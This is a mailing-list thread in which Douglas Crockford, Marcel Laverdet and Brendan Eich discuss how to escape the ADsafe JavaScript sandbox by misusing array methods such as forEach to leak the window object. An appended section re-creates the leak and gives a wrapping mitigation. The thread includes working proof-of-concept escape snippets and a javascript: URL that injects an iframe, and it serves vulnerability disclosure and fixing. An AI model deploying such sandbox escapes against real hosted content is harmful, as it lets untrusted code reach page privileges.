Re: ADsafe and bind

  • Douglas Crockford
    Message 1 of 13 , Sep 8 11:47 AM
      --- In caplet@yahoogroups.com, "marcel.laverdet" <marcel@...> wrote:

      Thanks, Marcel, that was really helpful. ADsafe's mozilla function is
      now conditioned on the existence of slots for concat, filter, map,
      reverse, slice, and sort.

      I haven't found the leak in forEach. How does that one work?
    • marcel.laverdet
      Message 2 of 13 , Sep 8 11:57 AM
        --- In caplet@yahoogroups.com, "Douglas Crockford" <douglas@...> wrote:
        >
        > --- In caplet@yahoogroups.com, "marcel.laverdet" <marcel@> wrote:
        >
        > Thanks, Marcel, that was really helpful. ADsafe's mozilla function is
        > now conditioned on the existence of slots for concat, filter, map,
        > reverse, slice, and sort.
        >
        > I haven't found the leak in forEach. How does that one work?
        >

        As follows:
        <iframe src="#"></iframe>
        <script>
        var leak;
        // (x || 0)(...) calls forEach as a plain value with no receiver, so
        // the object it iterates over is the window (which has one frame
        // thanks to the iframe above); that object is the callback's third
        // argument.
        ([].forEach || 0)(function(a, b, win) {
            leak = win;
        });
        leak.alert(leak);
        </script>

        Simple demo:
        http://llamaguy.com/adsafe/

        It even works in Safari :D
      • brendaneich
        Message 3 of 13 , Sep 8 12:20 PM
          --- In caplet@yahoogroups.com, "Douglas Crockford" <douglas@...> wrote:
          >
          > --- In caplet@yahoogroups.com, "marcel.laverdet" <marcel@> wrote:
          >
          > Thanks, Marcel, that was really helpful. ADsafe's mozilla function is
          > now conditioned on the existence of slots for concat, filter, map,
          > reverse, slice, and sort.
          >
          > I haven't found the leak in forEach. How does that one work?

          These vulnerabilities were first pointed out by Jeff Walden and Eli
          Friedman, then interns at Mozilla, in August 2007. Jeff wrote back
          then in reply to Marcel:

          "... you need only call it on something that has a length property (or
          a getter that doesn't throw), and so long as your provided function
          *is* one, it'll get called for each item less than the pre-computed
          length. Here's an example:

          =====

          <a onclick="boom();">click here</a>
          <script>

          function boom()
          {
              var win = null;
              // Take forEach as a plain function value so the call below has
              // no receiver; the object it then iterates over is handed to the
              // callback as its third argument. The [] passed as the second
              // argument is only the callback's own this value.
              var forEach = [].forEach;
              forEach(function(val, prop, thisp) {
                  win = thisp;
              }, []);
              win.alert("Hello world!");
          }

          </script>

          =====

          Aha, but that doesn't work, and for a simple enough reason: the test
          console page (presumably you used this) doesn't have any subframes,
          iframes, etc. Consequently, |window.length == 0| and there's nothing
          to iterate over, so the callback is never called. However, it's a
          reasonably safe bet that most Facebook pages *will* contain iframes
          for ads, and with an iframe in the document it'll succeed. To
          demonstrate this, simply run the following URL on the test console
          after loading the given example:

          javascript:var d = document;
          d.body.appendChild(d.createElement("iframe"));[].v

          Before I load that, the exploit fails. After I load it, it succeeds.

          Jeff

          0.
          http://developer.mozilla.org/en/docs/Core_JavaScript_1.5_Reference:Global_Objects:Array:forEach
          "

          Separately, Eli wrote:

          "Some other methods that are also vulnerable: Array.prototype.reverse,
          Array.prototype.sort, Array.prototype.forEach (returns this in Safari 2
          only), and Object.prototype.valueOf.

          Also, combined with Array.prototype.push or Array.prototype.unshift or
          the existence of a subframe, a similar vulnerability exists with
          Array.prototype.forEach, Array.prototype.every, Array.prototype.map,
          Array.prototype.some, Array.prototype.reduce (Fx 3 only),
          Array.prototype.reduceRight (Fx 3 only), and Array.prototype.filter.

          -Eli
          "

          So scrutinize all of the array extras, not just forEach, map, and filter.

          HTH, and credit where due.

          /be
        • Douglas Crockford
          Message 4 of 13 , Sep 8 1:06 PM
            --- In caplet@yahoogroups.com, "marcel.laverdet" <marcel@...> wrote:
            >
            > --- In caplet@yahoogroups.com, "Douglas Crockford" <douglas@> wrote:
            > >
            > > --- In caplet@yahoogroups.com, "marcel.laverdet" <marcel@> wrote:
            > >
            > > Thanks, Marcel, that was really helpful. ADsafe's mozilla function is
            > > now conditioned on the existence of slots for concat, filter, map,
            > > reverse, slice, and sort.
            > >
            > > I haven't found the leak in forEach. How does that one work?
            > >
            >
            > As follows:
            > <iframe src="#"></iframe>
            > <script>
            > var leak;
            > ([].forEach || 0)(function(a,b,win) {
            > leak = win;
            > });
            > leak.alert(leak);
            > </script>
            >
            > Simple demo:
            > http://llamaguy.com/adsafe/
            >
            > It even works in Safari :D

            Thanks. ADsafe is now wrapping concat every filter forEach map reduce
            reduceRight reverse slice some sort.
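
An added example, not code from this thread or from ADsafe, that reproduces the mechanism the messages above describe and the kind of wrapping ADsafe adopted. It assumes an ES5-or-later engine (Node or a current browser): since ES5, a built-in called with no receiver sees `this` as undefined and `Array.prototype.forEach` throws a TypeError instead of coercing to the global object, which `bareCall` demonstrates; the leak itself is therefore driven through `.call(fakeWin, ...)` against a constructed array-like stand-in for a pre-ES5 window holding one subframe. `makeFakeWindow`, `hardenArrayExtras` and the other names are the example's own, not ADsafe's.

```javascript
// Added example (not from the caplet thread or from ADsafe). Shows the
// receiver leak through the array extras and a wrap-every-extra mitigation,
// driven explicitly with .call() because ES5+ engines no longer coerce a
// missing receiver to the global object for built-in functions.

// The methods Crockford lists as wrapped in message 4.
const ARRAY_EXTRAS = ['concat', 'every', 'filter', 'forEach', 'map', 'reduce',
  'reduceRight', 'reverse', 'slice', 'some', 'sort'];

// Constructed stand-in for a pre-ES5 window: array-like, length equal to the
// number of subframes, index i holding frame i. Hypothetical, not a real DOM.
function makeFakeWindow(frameCount) {
  const win = { name: 'fake-window', length: frameCount };
  for (let i = 0; i < frameCount; i++) win[i] = { name: 'fake-subframe-' + i };
  win.alert = (msg) => 'alert:' + String(msg);
  return win;
}

// The leak: the callback's third argument is whatever object forEach iterated.
// Returns that object, or null when length is 0 and the callback never runs.
function leakReceiver(forEach, receiver) {
  let leaked = null;
  forEach.call(receiver, function (val, idx, thisp) { leaked = thisp; });
  return leaked;
}

// Eli's push/unshift variant: grow an empty receiver first so forEach has
// something to iterate, then leak it.
function growThenLeak(push, forEach, receiver) {
  push.call(receiver, 'injected'); // sets receiver[0] and bumps length to 1
  return leakReceiver(forEach, receiver);
}

// The "returns this" family (reverse, sort, Object.prototype.valueOf):
// the receiver comes straight back, no callback or subframe needed.
function returnsReceiver(method, receiver) {
  return method.call(receiver) === receiver;
}

// How the posted exploit invokes forEach: as a bare value with no receiver.
// On an ES5+ engine this throws a TypeError instead of leaking the global.
function bareCall(forEach) {
  let leaked = null;
  try {
    (forEach || 0)(function (a, b, thisp) { leaked = thisp; });
    return { threw: false, leaked: leaked };
  } catch (e) {
    return { threw: e instanceof TypeError, leaked: leaked };
  }
}

// Mitigation in the spirit of ADsafe's wrapping: copies of the extras that
// refuse any receiver that is not a genuine Array, wrapping only the slots
// that actually exist on the given prototype (the "conditioned on the
// existence of slots" check from message 1).
function hardenArrayExtras(proto, names) {
  const hardened = {};
  for (const name of names) {
    const original = proto[name];
    if (typeof original !== 'function') continue;
    hardened[name] = function () {
      // Array.isArray is ES5; the ES3-era equivalent was
      // Object.prototype.toString.call(this) === '[object Array]'.
      if (!Array.isArray(this)) {
        throw new TypeError('Array.prototype.' + name + ' called on a non-array receiver');
      }
      return original.apply(this, arguments);
    };
  }
  return hardened;
}

// True when calling method with the given receiver throws a TypeError.
function callThrows(method, receiver, ...args) {
  try { method.call(receiver, ...args); return false; }
  catch (e) { return e instanceof TypeError; }
}

// Stand-alone demo.
const demoWin = makeFakeWindow(1);
console.log('forEach leaks its receiver:', leakReceiver(Array.prototype.forEach, demoWin) === demoWin);
console.log('reverse returns its receiver:', returnsReceiver(Array.prototype.reverse, demoWin));
console.log('bare call on ES5+ throws:', bareCall(Array.prototype.forEach).threw);
const safe = hardenArrayExtras(Array.prototype, ARRAY_EXTRAS);
console.log('hardened forEach refuses the window:', callThrows(safe.forEach, demoWin, () => {}));
console.log('hardened map still works:', safe.map.call([1, 2], (x) => x * 2).join(','));
```

The receiver check lives inside the wrapper rather than at the call site, so it holds however the guest reaches the method: through `[].forEach`, as a bare function value, or via `.call`/`.apply`. It is the same reason the thread moves from "condition on the slots existing" to "wrap every array extra": the extras are generic over any object with a `length`, so anything that is not a real array, the window included, has to be rejected before the original runs.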